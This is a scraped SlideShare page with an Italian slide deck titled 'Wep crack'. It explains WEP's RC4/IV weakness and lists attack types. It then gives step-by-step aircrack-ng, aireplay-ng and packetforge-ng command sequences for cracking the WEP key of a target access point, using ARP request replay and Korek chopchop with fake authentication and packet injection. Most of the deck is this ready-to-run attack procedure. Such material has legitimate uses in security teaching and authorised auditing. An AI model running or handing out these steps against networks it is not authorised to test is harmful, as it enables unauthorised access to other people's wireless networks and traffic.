Wireless:        Questa insostenibile leggerezza                  dellessere...                                           ...
Il wireless     Come funziona lautenticazione fra access point e clientAl momento della connessione si attiva il four-way-...
Il wireless     Come funziona lautenticazione fra access point e client●La chiave comune (40 o 104bit) viene concatenata a...
La trasmissione wireless                     Possibili attacchi al WEP1) Deautenticazione: (solo WPA) scollega un client d...
Comandi per gestire la scheda wirelessIfconfig -a : Lista tutte le interfacceIfconfig wlan0 up/down : accende /spegne inte...
KISMETWireless sniffer# vi /usr/etc/kismet.confModificare la riga:ncsource=[nome_intefaccia]:type=[driver]
AIRCRACK-NG●Aircrack-ng – tool per il crack●Airmon-ng – configura la scheda in mode monitor●Airodump-ng – colleziona in pa...
AIRCRACK-NGVediamo un attacco veloce da eseguire contro unarete con client attivi, denominato ARP REQUESTREPLAY. Viene cat...
AIRCRACK-NG – fase 1 configurazioneConfigurare velocità (da settare appropriatamente)#iwconfig <interfaccia> rate 1MMetter...
AIRCRACK-NG – fase 2 ricerca bersaglio#Airodump-ng mon0Vengono mostrate le reti trovate, la cifratura, il sid(ESSID), il s...
AIRCRACK-NG – fase 3 acquisizione datiIniziate lacquisizione#Airodump-ng -c [canale] -b [BSSID] -w [file dump]mon0Dovete i...
AIRCRACK-NG – fase 4 fake authenticationSi deve stimolare lemissione di pacchetti ARP. Per farequesto prima si effettua un...
AIRCRACK-NG – fase 5 ARP request injectionPoi si stimola lemissione di ARP packet da catturaremediante injection. Nei pacc...
AIRCRACK-NG – fase 6 crack della WEP KEYDopo avere raccolto un numero sufficiente di pacchetti sipuò lanciare il programma...
AIRCRACK-NGProviamo un attacco contro access point senza clientwireless attivi, denominato Korek chopchop.In questo caso v...
AIRCRACK-NG – le fasi 1, 2, 3, 4 sono le stessse delprecedente esempio1) configurazione scheda   #Airmon-ng start wlan02) ...
AIRCRACK-NG – fase 5 ricerca pacchettoPer completare lattacco ci serve un pacchetto emessodallAP. Questo viene catturato e...
AIRCRACK-NG – fase 6 creazione falso ARPChiediamo a packetforge di creare un pacchetto ARP apartire dal file xor e salvarl...
AIRCRACK-NG – fase 7 iniezione falso ARPQuindi iniettiamo il pacchetto creato ed aspettiamo diavere 30000-40000 ivs.#airep...
AIRCRACK-NG – fase 8 crack della WEP KEYDopo avere raccolto un numero sufficiente di pacchetti sipuò lanciare il programma...
Upcoming SlideShare
Loading in...5
×

Wep crack

1,276

Published on

Published in: Lifestyle
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,276
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
38
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Wep crack

  1. 1. Wireless: Questa insostenibile leggerezza dellessere... WEPhttp://www.wardriving.it - http://www.backtrack.it By Aspy
  2. 2. Il wireless Come funziona lautenticazione fra access point e clientAl momento della connessione si attiva il four-way-handshake1)Il client fa una richiesta di autenticazione allAP (clientconnesso)2)LAP risponde inviando un pacchetto da 128 byte in chiaro3)Il client risponde reinviando tale pacchetto crittato con la chiavecomune (shared Key)4)LAP fa un check per verificare che il pacchetto sia stato crittatocorrettamente e garantisce al client la connessione in casoaffermativo (client autenticato)Quindi si possono sniffare pacchetti crittati ed i corrispondentipacchetti in chiaro :-)
  3. 3. Il wireless Come funziona lautenticazione fra access point e client●La chiave comune (40 o 104bit) viene concatenata al IV(initialing vector) per creare la chiave rc4 che viene usata percrittare i pacchetti tramite XOR ● chiave di crittazione=rc4(chiave+IV)●LIV viene inviato in chiaro.●lIV è lungo 24 bit, pertanto: 24 bit == 2^24 chiavi●Con abbastanza traffico, si fa in fretta ad utilizzare tutte lepossibili combinazioni di IV, quindi gli stessi IV vengono riutilizzatipiù volte.Dato che i pacchetti vengono crittati con XOR, e conoscendo IV,avendo abbastanza pacchetti è possibile risalire alla chiave.Nota: per le caratteristiche dei pacchetti ARP, si conoscono a priorii primi 16 byte del pacchetto, facilitando il crack della chiave
  4. 4. La trasmissione wireless Possibili attacchi al WEP1) Deautenticazione: (solo WPA) scollega un client dallAP a cuiè associato per indurlo a richiedere lautenticazione ottenendopacchetti di 4-way-handshake.2) Fake autentication: utile per collegarsi allAP anche se filtra iMAC address3) Interactive packet replay: replica i pacchetti letti stimolandolAP a fare altrettanto, raddoppiando di fatto il traffico generato4) Arp request reinjection: si individua una richiesta ARP cheviene reinviata ripetutamente in modo da generare continuerisposte e quindi traffico utile5) Korek chopchop: Basandosi su metodi statistici dicriptoanalisi si ricava la chiave WEP sfruttando le debolezze delprotocollo RC4.
  5. 5. Comandi per gestire la scheda wirelessIfconfig -a : Lista tutte le interfacceIfconfig wlan0 up/down : accende /spegne interfacciaIwconfig : mostra schede wirelessIwconfig wlan0 essid pippo : associa la scheda allAP con sid “pippo”Iwconfig wlan0 essid pippo key aabbccddeeff : associa la scheda allAP con sid “pippo” e chiave wep “aabbccddeeff”Iwconfig wlan0 mode monitor : pone la scheda in modalità monitorIwconfig wlan0 mode managed : pone la scheda in modalità standardIwlist wlan0 scan : effettua scansione per individuare reti wi.fi
  6. 6. KISMETWireless sniffer# vi /usr/etc/kismet.confModificare la riga:ncsource=[nome_intefaccia]:type=[driver]
  7. 7. AIRCRACK-NG●Aircrack-ng – tool per il crack●Airmon-ng – configura la scheda in mode monitor●Airodump-ng – colleziona in pacchetti●Aireplay-ng – inietta pacchetti arpAttenzione: per verificare se la proprio scheda direte permette di fare injection, usare il seguentecomando#aireplay-ng -9 ath0La risposta deve contenere: Device injection capabel was found
  8. 8. AIRCRACK-NGVediamo un attacco veloce da eseguire contro unarete con client attivi, denominato ARP REQUESTREPLAY. Viene catturato un pacchetto con unarichiesta ARP generata da un client e vienereplicato “iniettandolo” nella rete al fine di stimolarelAP a produrre un elevato numero di pacchetticontenenti IV.
  9. 9. AIRCRACK-NG – fase 1 configurazioneConfigurare velocità (da settare appropriatamente)#iwconfig <interfaccia> rate 1MMettere la scheda in modalità monitor#Airmon-ng start wlan0Questo crea una scheda virtuale “mon0” cheuseremo per il dump dei pacchettiPer ripristinare modalità managed#Airmon-ng stop wlan0#Airmon-ng stop mon0
  10. 10. AIRCRACK-NG – fase 2 ricerca bersaglio#Airodump-ng mon0Vengono mostrate le reti trovate, la cifratura, il sid(ESSID), il segnale, il mac (BSSID), il canaleSegnatevi i dati della rete trovata (ESSID, BSSID,canale)Segnatevi anche il mac della vostra scheda wi.fi
  11. 11. AIRCRACK-NG – fase 3 acquisizione datiIniziate lacquisizione#Airodump-ng -c [canale] -b [BSSID] -w [file dump]mon0Dovete indicare il canale ed il mac dellAP-w indica il nome del file dove memorizzare i pacchetticatturati
  12. 12. AIRCRACK-NG – fase 4 fake authenticationSi deve stimolare lemissione di pacchetti ARP. Per farequesto prima si effettua una associazione allAPAssociatevi allAP#Aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [MAC] mon0Dove e = SIDDove a = mac APDove h = mac scheda wi.fi
  13. 13. AIRCRACK-NG – fase 5 ARP request injectionPoi si stimola lemissione di ARP packet da catturaremediante injection. Nei pacchetti si trova lIV, che saràutilizzato per il crack vero e proprioAvvio della injection#Aireplay-ng -3 -b [BSSID] -h [MAC] mon0Dove b = mac APDove h = mac scheda wi.fi
  14. 14. AIRCRACK-NG – fase 6 crack della WEP KEYDopo avere raccolto un numero sufficiente di pacchetti sipuò lanciare il programma che tenta il crack della chiaveAvvio del programma di decrittazione#Aircrack-ng file.cap
  15. 15. AIRCRACK-NGProviamo un attacco contro access point senza clientwireless attivi, denominato Korek chopchop.In questo caso viene analizzato un pacchetto emessodallAP per estrarre i dati necessari a creare un falsopacchetto ARP request che viene iniettato nella rete perottenere pacchetti contenenti IV.
  16. 16. AIRCRACK-NG – le fasi 1, 2, 3, 4 sono le stessse delprecedente esempio1) configurazione scheda #Airmon-ng start wlan02) ricerca bersaglio #Airodump-ng mon03) cattura dei pacchetti#Airodump-ng -c [canale] -b [BSSID] -w [file dump] mon04) associazione allAP#Aireplay-ng -1 0 -e [ESSID] -a [BSSID] -h [MAC] mon0
  17. 17. AIRCRACK-NG – fase 5 ricerca pacchettoPer completare lattacco ci serve un pacchetto emessodallAP. Questo viene catturato ed analizzato al fine diforgiare un pacchetto ARP da iniettare.#aireplay-ng -4 -b [BSSID] -h [MAC] mon0Quando viene catturato un pacchetto adatto viene chiestaconferma per il suo lutilizzo. Quindi automaticamenteviene creato un file .xor necessario per creare il pacchettoarp da iniettare.
  18. 18. AIRCRACK-NG – fase 6 creazione falso ARPChiediamo a packetforge di creare un pacchetto ARP apartire dal file xor e salvarlo nel file pacchetto_arp.cap#packetforge-ng -0 -a [BSSID] -h [MAC] -k255.255.255.255 -l 255.255.255.255 -y [pacchetto.xor] -wpacchetto_arp.cap
  19. 19. AIRCRACK-NG – fase 7 iniezione falso ARPQuindi iniettiamo il pacchetto creato ed aspettiamo diavere 30000-40000 ivs.#aireplay-ng -2 -r pacchetto_arp.cap mon0
  20. 20. AIRCRACK-NG – fase 8 crack della WEP KEYDopo avere raccolto un numero sufficiente di pacchetti sipuò lanciare il programma che tenta il crack della chiaveAvvio del programma di decrittazione#Aircrack-ng file.cap
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×